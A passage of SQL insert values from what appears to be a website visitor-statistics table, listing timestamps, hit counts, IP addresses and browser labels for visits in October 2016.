,(66893,1476016743,1,0,1,0,'66.249.75.187',''),(66894,1476017215,1,1,0,0,'94.179.63.0','chrome'),(66895,1476017564,1,1,0,0,'51.255.65.66','other'),(66896,1476018375,1,1,0,0,'164.132.161.17','other'),(66897,1476018723,1,1,0,0,'164.132.161.72','other'),(66898,1476018866,1,1,0,0,'5.255.253.30','other'),(66899,1476018896,4,4,0,0,'130.193.51.19','other'),(66900,1476018913,2,2,0,0,'141.8.132.10','other'),(66901,1476018929,1,1,0,0,'163.172.65.52','other'),(66902,1476018937,1,1,0,0,'141.8.142.58','other'),(66903,1476018948,9,9,0,0,'130.193.50.34','other'),(66904,1476018998,11,11,0,0,'141.8.183.25','other'),(66905,1476019354,1,1,0,0,'141.8.142.61','other'),(66906,1476019356,1,0,1,0,'66.249.76.46',''),(66907,1476019820,1,1,0,0,'5.255.250.41','other'),(66908,1476020316,1,1,0,0,'157.55.39.38','other'),(66909,1476020346,1,1,0,0,'51.255.65.71','other'),(66910,1476020740,1,0,1,0,'66.249.69.149',''),(66911,1476020950,1,1,0,0,'163.172.66.181','other'),(66912,1476021100,1,1,0,0,'164.132.161.4','other'),(66913,1476021194,1,0,1,0,'66.249.76.45',''),(66914,1476022119,1,1,0,0,'66.102.9.29','chrome'),(66915,1476022367,1,0,1,0,'66.249.76.45',''),(66916,1476022548,1,1,0,0,'94.179.63.0','chrome'),(66917,1476022890,1,0,1,0,'66.249.75.187',''),(66918,1476022943,1,1,0,0,'163.172.66.53','other'),(66919,1476024410,1,0,1,0,'66.249.76.81',''),(66920,1476024412,1,1,0,0,'163.172.66.121','other'),(66921,1476024484,1,1,0,0,'91.196.178.38','chrome'),(66922,1476024582,2,2,0,0,'130.193.50.34','other'),(66923,1476024904,1,1,0,0,'163.172.66.58','other'),(66924,1476025833,1,1,0,0,'51.255.65.91','other'),(66925,1476026181,1,1,0,0,'164.132.161.31','other'),(66926,1476027085,1,1,0,0,'164.132.161.65','other'),(66927,1476027426,1,1,0,0,'164.132.161.80','other'),(66928,1476028175,1,1,0,0,'130.193.50.34','other'),(66929,1476029292,1,1,0,0,'164.132.161.18','other'),(66930,1476030102,1,0,1,0,'66.249.76.46',''),(66931,1476030207,1,1,0,0,'163.172.65.200','other'),(66932,1476030607,1,1,0,0,'94.178.70.64','firefox'),(66933,1476030647,1,1,0,0,'180.76.15.6','other'),(66934,1476030853,1,1,0,0,'51.255.65.5','other'),(66935,1476031018,1,0,1,0,'66.249.76.45',''),(66936,1476032356,1,1,0,0,'51.255.65.60','other'),(66937,1476032722,1,1,0,0,'109.63.151.151','msie'),(66938,1476033575,1,1,0,0,'51.255.65.85','other'),(66939,1476033787,1,1,0,0,'82.145.220.234','chrome'),(66940,1476036609,1,1,0,0,'51.255.65.17','other'),(66941,1476036715,1,0,1,0,'66.249.76.47',''),(66942,1476037704,1,1,0,0,'163.172.64.225','other'),(66943,1476038048,1,1,0,0,'37.54.115.30','firefox'),(66944,1476038835,1,0,1,0,'66.249.76.46',''),(66945,1476039466,1,1,0,0,'164.132.161.30','other'),(66946,1476039697,2,2,0,0,'141.8.183.25','other'),(66947,1476039928,1,1,0,0,'157.55.39.241','other'),(66948,1476039992,1,1,0,0,'130.193.51.19','other'),(66949,1476040035,1,1,0,0,'141.8.142.58','other'),(66950,1476040036,1,1,0,0,'51.255.65.97','other'),(66951,1476040634,1,1,0,0,'178.92.249.254','firefox'),(66952,1476040851,1,1,0,0,'164.132.161.74','other'),(66953,1476040993,1,0,1,0,'66.249.75.179',''),(66954,1476043492,1,1,0,0,'66.249.83.75','other'),(66955,1476043523,1,1,0,0,'130.193.51.19','other'),(66956,1476044225,1,1,0,0,'51.255.65.4','other'),(66957,1476045069,1,0,1,0,'66.249.76.46',''),(66958,1476045587,1,0,1,0,'66.249.76.47',''),(66959,1476046162,1,0,1,0,'66.249.69.152',''),(66960,1476047000,1,1,0,0,'163.172.66.58','other'),(66961,1476047387,1,0,1,0,'66.249.75.183',''),(66962,1476047946,1,1,0,0,'164.132.161.94','other'),(66963,1476047977,1,0,1,0,'66.249.75.187',''),(66964,1476048474,1,1,0,0,'164.132.161.90','other'),(66965,1476049188,1,1,0,0,'66.102.9.25','other'),(66966,1476050120,1,1,0,0,'163.172.65.113','other'),(66967,1476050481,2,0,2,0,'66.249.76.46',''),(66968,1476050646,1,1,0,0,'163.172.66.139','other'),(66969,1476050842,1,1,0,0,'163.172.65.30','other'),(66970,1476051126,1,1,0,0,'157.55.39.241','other'),(66971,1476051130,1,1,0,0,'157.55.39.57','other'),(66972,1476051247,1,0,1,0,'66.249.75.183',''),(66973,1476051530,1,1,0,0,'163.172.64.183','other'),(66974,1476051737,1,1,0,0,'66.102.9.29','other'),(66975,1476051833,1,1,0,0,'51.255.65.85','other'),(66976,1476052468,1,0,1,0,'66.249.76.77',''),(66977,1476052545,2,0,2,0,'66.249.76.47',''),(66978,1476053027,1,1,0,0,'163.172.65.25','other'),(66979,1476053031,1,1,0,0,'163.172.66.85','other'),(66980,1476053467,1,0,1,0,'66.249.75.187',''),(66981,1476054768,1,1,0,0,'66.102.9.25','other'),(66982,1476055419,1,1,0,0,'157.55.39.147','other'),(66983,1476055871,1,0,1,0,'66.249.76.45',''),(66984,1476056088,1,1,0,0,'164.132.161.60','other'),(66985,1476056289,1,1,0,0,'163.172.66.181','other'),(66986,1476056416,1,1,0,0,'51.255.65.62','other'),(66987,1476056736,1,1,0,0,'51.255.65.46','other'),(66988,1476057059,1,1,0,0,'164.132.161.45','other'),(66989,1476057864,1,1,0,0,'51.255.65.41','other'),(66990,1476057894,1,1,0,0,'66.102.9.25','other'),(66991,1476058294,1,0,1,0,'66.249.76.46',''),(66992,1476058389,1,0,1,0,'66.249.76.47',''),(66993,1476059625,1,0,1,0,'66.249.75.183',''),(66994,1476059718,1,0,1,0,'66.249.76.81',''),(66995,1476059998,1,0,1,0,'66.249.75.179',''),(66996,1476060157,1,0,1,0,'66.249.69.155',''),(66997,1476060173,1,1,0,0,'176.15.244.130','msie'),(66998,1476060328,1,0,1,0,'66.249.76.45',''),(66999,1476060333,1,1,0,0,'157.55.39.241','other'),(67000,1476061236,1,0,1,0,'66.249.75.183',''),(67001,1476061493,1,1,0,0,'66.102.9.25','other'),(67002,1476061802,1,1,0,0,'130.193.50.34','other'),(67003,1476062435,2,0,2,0,'66.249.75.179',''),(67004,1476062932,1,0,1,0,'66.249.76.45',''),(67005,1476063524,1,1,0,0,'163.172.65.249','other'),(67006,1476063876,1,1,0,0,'51.255.65.28','other'),(67007,1476063916,1,0,1,0,'66.249.75.187',''),(67008,1476064411,1,1,0,0,'163.172.66.58','other'),(67009,1476064412,1,0,1,0,'66.249.76.46',''),(67010,1476064482,1,0,1,0,'66.249.75.183',''),(67011,1476064626,1,0,1,0,'66.249.76.47',''),(67012,1476064916,1,1,0,0,'164.132.161.27','other'),(67013,1476065095,1,1,0,0,'66.102.9.27','other'),(67014,1476065932,1,1,0,0,'157.55.39.57','other'),(67015,1476066066,1,1,0,0,'163.172.66.116','other'),(67016,1476066673,1,0,1,0,'66.249.76.79',''),(67017,1476067195,1,1,0,0,'163.172.66.162','other'),(67018,1476068464,1,0,1,0,'66.249.69.152',''),(67019,1476068688,1,1,0,0,'66.102.9.27','other'),(67020,1476068769,1,1,0,0,'164.132.161.15','other'),(67021,1476069293,1,1,0,0,'163.172.66.150','other'),(67022,1476069651,1,1,0,0,'164.132.161.68','other'),(67023,1476070926,1,1,0,0,'51.255.65.57','other'),(67024,1476070982,1,1,0,0,'51.255.65.45','other'),(67025,1476071705,1,1,0,0,'51.255.65.32','other'),(67026,1476071936,2,0,2,0,'66.249.75.183',''),(67027,1476071978,1,1,0,0,'157.55.39.241','other'),(67028,1476072287,1,1,0,0,'66.102.9.29','other'),(67029,1476072488,1,1,0,0,'130.193.50.34','other'),(67030,1476072955,1,1,0,0,'157.55.39.147','other'),(67031,1476073018,1,0,1,0,'66.249.76.45',''),(67032,1476073645,1,0,1,0,'66.249.76.46',''),(67033,1476074169,1,1,0,0,'163.172.64.225','other'),(67034,1476074173,1,1,0,0,'51.255.65.43','other'),(67035,1476074678,1,0,1,0,'66.249.75.183',''),(67036,1476075808,1,1,0,0,'51.255.65.21','other'),(67037,1476076106,1,1,0,0,'66.102.9.27','other'),(67038,1476076215,1,0,1,0,'66.249.75.187',''),(67039,1476076636,1,1,0,0,'164.132.161.77','other'),(67040,1476077098,2,0,2,0,'66.249.69.152',''),(67041,1476077335,1,0,1,0,'66.249.76.46',''),(67042,1476077463,1,1,0,0,'94.179.22.197','firefox'),(67043,1476077469,1,1,0,0,'164.132.161.15','other'),(67044,1476077840,1,0,1,0,'66.249.76.45',''),(67045,1476078124,1,1,0,0,'51.255.65.19','other'),(67046,1476078188,1,1,0,0,'51.255.65.56','other'),(67047,1476078483,1,1,0,0,'163.172.64.242','other'),(67048,1476078522,1,1,0,0,'163.172.66.23','other'),(67049,1476078838,1,1,0,0,'91.196.178.71','firefox'),(67050,1476079016,1,1,0,0,'180.76.15.9','other'),(67051,1476079087,1,1,0,0,'164.132.161.51','other'),(67052,1476079552,1,1,0,0,'163.172.65.248','other'),(67053,1476079673,1,1,0,0,'164.132.161.43','other'),(67054,1476079716,1,1,0,0,'162.210.196.129','other'),(67055,1476079730,1,0,1,0,'66.249.69.149',''),(67056,1476079749,1,1,0,0,'163.172.64.250','other'),(67057,1476079931,1,1,0,0,'66.102.9.29','other'),(67058,1476079998,1,0,1,0,'66.249.76.45',''),(67059,1476080055,1,1,0,0,'163.172.65.123','other'),(67060,1476080154,1,0,1,0,'66.249.75.179',''),(67061,1476080490,1,1,0,0,'141.8.183.25','other'),(67062,1476080619,1,1,0,0,'51.255.65.14','other'),(67063,1476080874,1,0,1,0,'66.249.69.155',''),(67064,1476081005,1,1,0,0,'163.172.64.234','other'),(67065,1476081311,1,1,0,0,'164.132.161.11','other'),(67066,1476081388,1,1,0,0,'163.172.65.233','other'),(67067,1476081504,1,0,1,0,'66.249.75.187',''),(67068,1476081656,1,1,0,0,'95.28.37.112','msie'),(67069,1476081896,1,0,1,0,'66.249.75.183',''),(67070,1476081941,1,0,1,0,'66.249.76.46',''),(67071,1476081982,1,1,0,0,'164.132.161.81','other'),(67072,1476082301,1,0,1,0,'66.249.76.47',''),(67073,1476082350,1,1,0,0,'91.196.177.15','chrome'),(67074,1476083003,1,1,0,0,'164.132.161.77','other'),(67075,1476083283,1,1,0,0,'66.102.9.27','other'),(67076,1476083540,1,1,0,0,'66.102.9.27','chrome'),(67077,1476083641,1,1,0,0,'163.172.65.226','other'),(67078,1476083749,1,1,0,0,'95.158.63.130','firefox'),(67079,1476083812,1,1,0,0,'141.8.142.58','other'),(67080,1476083933,1,1,0,0,'217.69.133.68','other'),(67081,1476084109,1,0,1,0,'66.249.76.45',''),(67082,1476084807,1,1,0,0,'95.158.63.130','firefox'),(67083,1476084988,1,1,0,0,'51.255.65.15','other'),(67084,1476085096,1,1,0,0,'164.132.161.60','other'),(67085,1476086337,1,1,0,0,'91.196.178.70','chrome'),(67086,1476086503,1,1,0,0,'188.255.22.110','msie'),(67087,1476087022,1,1,0,0,'163.172.65.239','other'),(67088,1476087219,1,1,0,0,'91.196.178.133','firefox'),(67089,1476088522,1,0,1,0,'68.180.229.114',''),(67090,1476089609,1,1,0,0,'130.193.51.19','other'),(67091,1476089885,1,1,0,0,'163.172.66.183','other'),(67092,1476091290,1,1,0,0,'163.172.65.233','other'),(67093,1476091369,1,1,0,0,'91.196.178.66','firefox'),(67094,1476091435,1,0,1,0,'68.180.229.114',''),(67095,1476091461,1,1,0,0,'163.172.64.253','other'),(67096,1476091534,1,1,0,0,'207.46.13.83','other'),(67097,1476091621,1,1,0,0,'51.255.65.82','other'),(67098,1476091698,1,1,0,0,'130.193.50.34','other'),(67099,1476091729,1,1,0,0,'164.132.161.85','other'),(67100,1476091781,1,1,0,0,'164.132.161.66','other'),(67101,1476092225,1,1,0,0,'51.255.65.18','other'),(67102,1476092788,1,1,0,0,'163.172.65.65','other'),(67103,1476093270,1,1,0,0,'180.76.15.31','other'),(67104,1476093984,1,1,0,0,'91.196.178.67','chrome'),(67105,1476094058,1,1,0,0,'130.193.50.34','other'),(67106,1476094072,1,1,0,0,'163.172.66.48','other'),(67107,1476095242,1,1,0,0,'207.46.13.83','other'),(67108,1476095507,1,1,0,0,'163.172.66.83','other'),(67109,1476095983,1,1,0,0,'130.193.51.19','other'),(67110,1476096279,1,1,0,0,'51.255.65.40','other'),(67111,1476096487,1,1,0,0,'164.132.161.77','other'),(67112,1476096689,1,1,0,0,'130.193.50.34','other'),(67113,1476096955,1,1,0,0,'91.196.178.72','firefox'),(67114,1476097969,1,1,0,0,'176.113.209.199','chrome'),(67115,1476098133,1,1,0,0,'91.196.178.67','firefox'),(67116,1476099600,1,1,0,0,'66.249.76.81','chrome'),(67117,1476099625,1,1,0,0,'91.196.178.71','firefox'),(67118,1476100194,1,1,0,0,'66.249.76.46','chrome'),(67119,1476100566,1,1,0,0,'91.196.178.129','chrome'),(67120,1476101175,1,1,0,0,'163.172.66.120','other'),(67121,1476101491,1,1,0,0,'163.172.65.199','other'),(67122,1476101778,1,1,0,0,'163.172.66.172','other'),(67123,1476102420,1,1,0,0,'91.196.178.71','firefox'),(67124,1476102443,1,1,0,0,'164.132.161.7','other'),(67125,1476102523,1,1,0,0,'130.193.50.34','other'),(67126,1476102809,1,1,0,0,'51.255.65.93','other'),(67127,1476102927,1,1,0,0,'164.132.161.75','other'),(67128,1476102932,1,1,0,0,'91.196.178.67','chrome'),(67129,1476104149,1,0,1,0,'66.249.76.47',''),(67130,1476104775,1,1,0,0,'174.129.237.157','other'),(67131,1476104984,1,1,0,0,'51.255.65.47','other'),(67132,1476105602,1,1,0,0,'163.172.66.71','other'),(67133,1476106459,1,1,0,0,'91.196.178.66','chrome'),(67134,1476106645,1,1,0,0,'91.196.178.66','firefox'),(67135,1476107182,1,1,0,0,'51.255.65.77','other'),(67136,1476107531,1,1,0,0,'164.132.161.91','other'),(67137,1476107877,1,1,0,0,'174.129.237.157','other'),(67138,1476108410,1,0,1,0,'68.180.229.190',''),(67139,1476108498,1,1,0,0,'91.196.178.66','firefox'),(67140,1476108813,1,1,0,0,'51.255.65.79','other'),(67141,1476109207,1,1,0,0,'91.196.178.71','firefox'),(67142,1476109289,1,1,0,0,'51.255.65.28','other'),(67143,1476109322,1,1,0,0,'91.196.178.67','chrome'),(67144,1476109448,1,1,0,0,'51.255.65.26','other'),(67145,1476110613,1,1,0,0,'51.255.65.77','other'),(67146,1476110739,1,1,0,0,'217.69.133.169','firefox'),(67147,1476111209,1,1,0,0,'195.230.152.150','other'),(67148,1476111541,1,1,0,0,'51.255.65.82','other'),(67149,1476112179,1,1,0,0,'51.255.65.6','other'),(67150,1476112759,1,1,0,0,'164.132.161.20','other'),(67151,1476112990,1,0,1,0,'68.180.229.114',''),(67152,1476113016,1,1,0,0,'164.132.161.30','other'),(67153,1476113814,1,1,0,0,'91.196.178.167','chrome'),(67154,1476113982,2,2,0,0,'66.102.9.27','chrome'),(67155,1476114181,1,1,0,0,'130.193.50.34','other'),(67156,1476114982,1,1,0,0,'91.196.178.167','chrome'),(67157,1476115037,1,1,0,0,'163.172.66.90','other'),(67158,1476115415,1,1,0,0,'174.129.237.157','other'),(67159,1476115485,1,1,0,0,'164.132.161.83','other'),(67160,1476115661,1,1,0,0,'163.172.66.50','other'),(67161,1476116102,1,1,0,0,'164.132.161.53','other'),(67162,1476116343,1,1,0,0,'164.132.161.41','other'),(67163,1476116533,1,1,0,0,'51.255.65.64','other'),(67164,1476116624,1,1,0,0,'163.172.66.46','other'),(67165,1476117119,1,1,0,0,'217.69.133.232','other'),(67166,1476117128,1,1,0,0,'163.172.64.228','other'),(67167,1476117634,1,1,0,0,'51.255.65.30','other'),(67168,1476117854,1,1,0,0,'163.172.65.251','other'),(67169,1476118410,1,1,0,0,'91.196.178.68','firefox'),(67170,1476118768,4,4,0,0,'130.193.50.34','other'),(67171,1476118781,1,1,0,0,'163.172.66.162','other'),(67172,1476118848,1,1,0,0,'141.8.183.25','other'),(67173,1476119746,1,1,0,0,'164.132.161.16','other'),(67174,1476119971,1,1,0,0,'164.132.161.47','other'),(67175,1476120278,1,1,0,0,'193.25.176.133','chrome'),(67176,1476120469,1,1,0,0,'188.163.76.153','chrome'),(67177,1476120489,1,1,0,0,'163.172.66.13','other'),(67178,1476120990,1,1,0,0,'163.172.66.181','other'),(67179,1476121079,1,1,0,0,'51.255.65.80','other'),(67180,1476121625,1,1,0,0,'91.196.178.97','chrome'),(67181,1476121991,1,0,1,0,'66.249.76.45',''),(67182,1476122570,1,1,0,0,'130.193.50.34','other'),(67183,1476122766,1,1,0,0,'66.102.9.25','other'),(67184,1476125519,1,1,0,0,'46.164.135.178','chrome'),(67185,1476125926,1,1,0,0,'87.253.50.239','firefox'),(67186,1476126376,1,1,0,0,'66.102.9.27','other'),(67187,1476127641,1,1,0,0,'178.92.249.254','firefox'),(67188,1476128533,1,0,1,0,'66.249.75.183',''),(67189,1476128595,1,1,0,0,'5.1.24.239','chrome'),(67190,1476128837,1,1,0,0,'188.163.76.153','chrome'),(67191,1476129899,1,1,0,0,'66.102.9.27','other'),(67192,1476133006,1,1,0,0,'66.102.9.27','chrome'),(67193,1476133312,1,1,0,0,'91.196.178.162','other'),(67194,1476133756,1,1,0,0,'66.102.9.27','other'),(67195,1476133779,1,0,1,0,'66.249.76.46',''),(67196,1476133780,2,0,2,0,'66.249.75.179',''),(67197,1476134730,1,1,0,0,'130.193.50.34','other'),(67198,1476134872,1,1,0,0,'157.55.39.114','other'),(67199,1476135699,1,1,0,0,'2.94.80.108','chrome'),(67200,1476136002,1,0,1,0,'66.249.76.46',''),(67201,1476137157,1,1,0,0,'66.102.9.25','other'),(67202,1476137787,2,2,0,0,'62.210.148.247','other'),(67203,1476137911,1,1,0,0,'163.172.65.220','other'),(67204,1476138329,1,1,0,0,'163.172.66.142','other'),(67205,1476140209,2,0,2,0,'66.249.76.47',''),(67206,1476140855,1,1,0,0,'157.55.39.241','other'),(67207,1476141251,1,1,0,0,'66.102.9.25','other'),(67208,1476141417,1,1,0,0,'164.132.161.83','other'),(67209,1476143689,1,1,0,0,'164.132.161.25','other'),(67210,1476144146,1,1,0,0,'163.172.65.36','other'),(67211,1476144648,1,1,0,0,'66.102.9.25','other'),(67212,1476144820,48,48,0,0,'46.4.32.75','other'),(67213,1476145237,1,1,0,0,'163.172.64.224','other'),(67214,1476145275,176,176,0,0,'144.76.29.162','other'),(67215,1476145734,1,1,0,0,'163.172.66.157','other'),(67216,1476146027,1,1,0,0,'163.172.65.205','other'),(67217,1476147152,1,1,0,0,'51.255.65.36','other'),(67218,1476148169,1,1,0,0,'164.132.161.80','other'),(67219,1476148225,1,1,0,0,'66.102.9.27','other'),(67220,1476148891,1,1,0,0,'163.172.65.43','other'),(67221,1476148995,1,1,0,0,'51.255.65.12','other'),(67222,1476151247,1,0,1,0,'66.249.75.187',''),(67223,1476151483,1,1,0,0,'163.172.65.181','other'),(67224,1476151663,1,1,0,0,'174.129.237.157','other'),(67225,1476152131,1,1,0,0,'66.102.9.27','other'),(67226,1476152185,1,1,0,0,'163.172.65.131','other'),(67227,1476152511,1,1,0,0,'185.154.13.71','firefox'),(67228,1476153384,1,1,0,0,'163.172.66.142','other'),(67229,1476153564,1,1,0,0,'130.193.50.34','other'),(67230,1476154893,1,1,0,0,'163.172.66.143','other'),(67231,1476155449,1,1,0,0,'163.172.66.167','other'),(67232,1476156647,1,1,0,0,'163.172.66.119','other'),(67233,1476156654,1,1,0,0,'164.132.161.63','other'),(67234,1476156769,1,1,0,0,'163.172.66.138','other'),(67235,1476156816,1,1,0,0,'164.132.161.65','other'),(67236,1476157740,1,1,0,0,'164.132.161.32','other'),(67237,1476157839,1,1,0,0,'163.172.65.41','other'),(67238,1476158692,1,1,0,0,'130.193.50.34','other'),(67239,1476158811,1,1,0,0,'164.132.161.59','other'),(67240,1476159007,1,1,0,0,'51.255.65.20','other'),(67241,1476159113,1,1,0,0,'164.132.161.36','other'),(67242,1476159818,1,1,0,0,'51.255.65.83','other'),(67243,1476159995,1,1,0,0,'163.172.65.236','other'),(67244,1476160253,1,1,0,0,'46.42.165.196','chrome'),(67245,1476161198,1,1,0,0,'95.27.11.58','other'),(67246,1476161661,1,1,0,0,'164.132.161.20','other'),(67247,1476162421,1,1,0,0,'141.8.183.25','other'),(67248,1476164370,1,1,0,0,'91.196.178.69','firefox'),(67249,1476164500,1,1,0,0,'91.196.178.72','chrome'),(67250,1476164704,1,1,0,0,'46.73.196.101','chrome'),(67251,1476166717,1,1,0,0,'163.172.66.27','other'),(67252,1476166802,1,1,0,0,'51.255.65.61','other'),(67253,1476167151,1,1,0,0,'164.132.161.79','other'),(67254,1476167235,1,1,0,0,'94.179.97.147','firefox'),(67255,1476167400,1,1,0,0,'130.193.50.34','other'),(67256,1476167470,1,1,0,0,'51.255.65.65','other'),(67257,1476168714,1,1,0,0,'163.172.66.2','other'),(67258,1476169163,1,1,0,0,'180.76.15.143','other'),(67259,1476169315,1,1,0,0,'130.193.50.34','other'),(67260,1476169545,1,1,0,0,'164.132.161.70','other'),(67261,1476170539,1,1,0,0,'51.255.65.4','other'),(67262,1476170901,1,0,1,0,'66.249.76.47',''),(67263,1476171488,1,1,0,0,'51.255.65.9','other'),(67264,1476171490,1,1,0,0,'163.172.66.145','other'),(67265,1476171533,1,1,0,0,'82.207.91.234','firefox'),(67266,1476171700,1,1,0,0,'51.255.65.12','other'),(67267,1476171838,1,1,0,0,'91.196.177.15','chrome'),(67268,1476172451,1,1,0,0,'163.172.66.25','other'),(67269,1476172935,1,1,0,0,'163.172.65.225','other'),(67270,1476173302,1,1,0,0,'37.54.62.59','firefox'),(67271,1476173963,1,1,0,0,'163.172.65.239','other'),(67272,1476174954,1,1,0,0,'178.92.248.205','chrome'),(67273,1476175200,202,202,0,0,'151.80.41.169','other'),(67274,1476175273,1,1,0,0,'51.255.65.13','other'),(67275,1476175418,1,1,0,0,'130.193.50.34','other'),(67276,1476175487,1,1,0,0,'164.132.161.44','other'),(67277,1476176709,1,1,0,0,'66.102.9.27','other'),(67278,1476176946,1,1,0,0,'51.255.65.7','other'),(67279,1476177146,1,1,0,0,'163.172.66.150','other'),(67280,1476177471,1,1,0,0,'93.73.234.193','firefox'),(67281,1476178940,1,1,0,0,'66.102.9.27','chrome'),(67282,1476179119,1,1,0,0,'195.230.152.150','other'),(67283,1476179602,1,1,0,0,'163.172.65.61','other'),(67284,1476179668,1,1,0,0,'78.154.165.48','firefox'),(67285,1476180134,1,1,0,0,'163.172.66.127','other'),(67286,1476180163,1,1,0,0,'91.196.178.165','firefox'),(67287,1476180331,1,1,0,0,'37.54.62.59','firefox'),(67288,1476180562,1,1,0,0,'66.102.9.27','other'),(67289,1476180958,1,1,0,0,'163.172.65.180','other'),(67290,1476181861,1,1,0,0,'164.132.161.79','other'),(67291,1476181963,1,1,0,0,'164.132.161.92','other'),(67292,1476182127,1,1,0,0,'162.210.196.97','other'),(67293,1476182255,1,1,0,0,'163.172.65.132','other'),(67294,1476182680,1,1,0,0,'178.92.52.183','chrome'),(67295,1476182848,1,1,0,0,'178.92.248.71','chrome'),(67296,1476182964,1,1,0,0,'164.132.161.24','other'),(67297,1476183615,1,1,0,0,'51.255.65.15','other'),(67298,1476183634,1,1,0,0,'163.172.66.148','other'),(67299,1476183994,1,1,0,0,'164.132.161.54','other'),(67300,1476184351,6,6,0,0,'37.9.47.25','chrome'),(67301,1476184416,1,1,0,0,'130.193.50.34','other'),(67302,1476184656,1,1,0,0,'66.102.9.25','other'),(67303,1476184756,1,1,0,0,'5.255.250.41','other'),(67304,1476184802,1,1,0,0,'164.132.161.66','other'),(67305,1476184858,1,1,0,0,'51.255.65.76','other'),(67306,1476184907,1,1,0,0,'91.196.178.70','chrome'),(67307,1476185259,1,1,0,0,'91.196.178.65','chrome'),(67308,1476185530,1,1,0,0,'163.172.66.27','other'),(67309,1476185680,1,1,0,0,'91.196.178.67','firefox'),(67310,1476185951,1,1,0,0,'180.76.15.5','other'),(67311,1476186112,1,1,0,0,'163.172.65.219','other'),(67312,1476188066,1,1,0,0,'51.255.65.71','other'),(67313,1476188150,1,1,0,0,'66.102.9.25','other'),(67314,1476188462,1,1,0,0,'91.196.178.129','firefox'),(67315,1476189427,1,1,0,0,'163.172.65.247','other'),(67316,1476189788,1,1,0,0,'163.172.65.32','other'),(67317,1476190519,1,1,0,0,'51.255.65.23','other'),(67318,1476190656,1,1,0,0,'164.132.161.12','other'),(67319,1476190695,1,1,0,0,'51.255.65.51','other'),(67320,1476190995,1,1,0,0,'163.172.66.72','other'),(67321,1476191009,1,1,0,0,'163.172.66.140','other'),(67322,1476191087,1,1,0,0,'66.102.9.27','other'),(67323,1476191297,1,1,0,0,'164.132.161.4','other'),(67324,1476191482,1,1,0,0,'37.52.133.136','firefox'),(67325,1476192038,1,1,0,0,'164.132.161.37','other'),(67326,1476192288,1,1,0,0,'163.172.66.22','other'),(67327,1476192509,1,0,1,0,'66.249.76.47',''),(67328,1476192551,1,1,0,0,'163.172.64.223','other'),(67329,1476193077,1,1,0,0,'91.196.178.72','chrome'),(67330,1476193369,1,1,0,0,'212.1.108.150','chrome'),(67331,1476193450,1,1,0,0,'94.179.123.200','firefox'),(67332,1476193600,1,1,0,0,'163.172.65.225','other'),(67333,1476194023,1,1,0,0,'91.196.178.69','firefox'),(67334,1476194688,1,1,0,0,'66.102.9.25','other'),(67335,1476195263,1,1,0,0,'163.172.65.59','other'),(67337,1476195567,1,1,0,0,'91.196.178.69','firefox'),(67338,1476196151,1,1,0,0,'40.77.167.4','other'),(67339,1476197239,1,1,0,0,'163.172.66.101','other'),(67340,1476197255,1,1,0,0,'164.132.161.13','other'),(67341,1476197457,1,1,0,0,'51.255.65.68','other'),(67342,1476197523,1,1,0,0,'178.159.208.41','firefox'),(67343,1476197658,1,1,0,0,'66.249.76.77','chrome'),(67344,1476197668,1,1,0,0,'66.249.76.46','chrome'),(67345,1476197718,1,1,0,0,'164.132.161.55','other'),(67346,1476197797,1,1,0,0,'164.132.161.9','other'),(67347,1476197848,1,1,0,0,'163.172.64.180','other'),(67348,1476197873,1,1,0,0,'163.172.65.60','other'),(67349,1476197901,1,1,0,0,'163.172.66.103','other'),(67350,1476198288,1,1,0,0,'66.102.9.25','other'),(67351,1476198703,1,1,0,0,'164.132.161.24','other'),(67352,1476198729,1,1,0,0,'201.67.104.219','firefox'),(67353,1476199155,1,1,0,0,'66.249.76.45','chrome'),(67354,1476199166,1,1,0,0,'66.249.76.46','chrome'),(67355,1476199278,1,1,0,0,'95.134.185.146','chrome'),(67356,1476199853,1,1,0,0,'37.53.111.40','firefox'),(67357,1476199983,1,1,0,0,'164.132.161.50','other'),(67358,1476200041,1,1,0,0,'164.132.161.45','other'),(67359,1476200203,1,1,0,0,'91.196.178.70','firefox'),(67360,1476200412,1,0,1,0,'66.249.76.45',''),(67361,1476200616,1,0,1,0,'66.249.76.46',''),(67362,1476200985,1,1,0,0,'163.172.65.69','other'),(67363,1476201362,1,1,0,0,'163.172.64.229','other'),(67364,1476201448,1,1,0,0,'164.132.161.91','other'),(67365,1476201600,1,1,0,0,'51.255.65.2','other'),(67366,1476201838,1,1,0,0,'130.193.50.34','other'),(67367,1476202033,1,1,0,0,'164.132.161.54','other'),(67368,1476202072,1,1,0,0,'66.102.9.25','other'),(67369,1476202366,1,1,0,0,'163.172.66.104','other'),(67370,1476203102,1,1,0,0,'207.46.13.183','other'),(67371,1476203472,1,1,0,0,'91.196.178.165','chrome'),(67372,1476203792,1,1,0,0,'94.179.26.47','chrome'),(67373,1476203903,1,1,0,0,'46.201.134.216','chrome'),(67374,1476204687,1,0,1,0,'66.249.76.47',''),(67375,1476204841,1,1,0,0,'164.132.161.80','other'),(67376,1476205300,1,1,0,0,'51.255.65.14','other'),(67377,1476205533,1,1,0,0,'163.172.65.15','other'),(67378,1476205572,1,1,0,0,'66.102.9.29','other'),(67379,1476205684,1,0,1,0,'66.249.75.179',''),(67380,1476205986,1,0,1,0,'66.249.75.187',''),(67381,1476206031,1,0,1,0,'66.249.76.77',''),(67382,1476206097,1,1,0,0,'51.255.65.72','other'),(67383,1476206205,1,1,0,0,'163.172.65.60','other'),(67384,1476206572,1,0,1,0,'66.249.76.45',''),(67385,1476206631,1,0,1,0,'66.249.76.79',''),(67387,1476206733,1,0,1,0,'68.180.229.114',''),(67388,1476207566,1,1,0,0,'164.132.161.87','other'),(67389,1476207571,25,25,0,0,'69.197.177.50','other'),(67390,1476208384,1,0,1,0,'66.249.76.45',''),(67391,1476208517,1,1,0,0,'163.172.66.137','other'),(67392,1476209086,1,1,0,0,'66.102.9.29','other'),(67393,1476210334,1,1,0,0,'94.179.54.134','chrome'),(67394,1476210564,1,0,1,0,'66.249.76.45',''),(67395,1476211303,1,1,0,0,'164.132.161.71','other'),(67396,1476212330,1,1,0,0,'163.172.66.149','other'),(67397,1476212685,1,1,0,0,'66.102.9.25','other'),(67398,1476213101,1,1,0,0,'164.132.161.31','other'),(67399,1476213206,1,0,1,0,'66.249.76.47',''),(67400,1476213961,1,1,0,0,'141.8.183.25','other'),(67401,1476214249,1,0,1,0,'66.249.76.45',''),(67402,1476214642,1,0,1,0,'66.249.76.47',''),(67403,1476214851,1,1,0,0,'164.132.161.45','other'),(67404,1476215302,1,1,0,0,'185.26.182.35','opera'),(67405,1476215855,1,0,1,0,'66.249.76.47',''),(67406,1476216126,1,0,1,0,'66.249.75.183',''),(67407,1476216155,1,1,0,0,'51.255.65.53','other'),(67408,1476216529,1,1,0,0,'66.102.9.29','o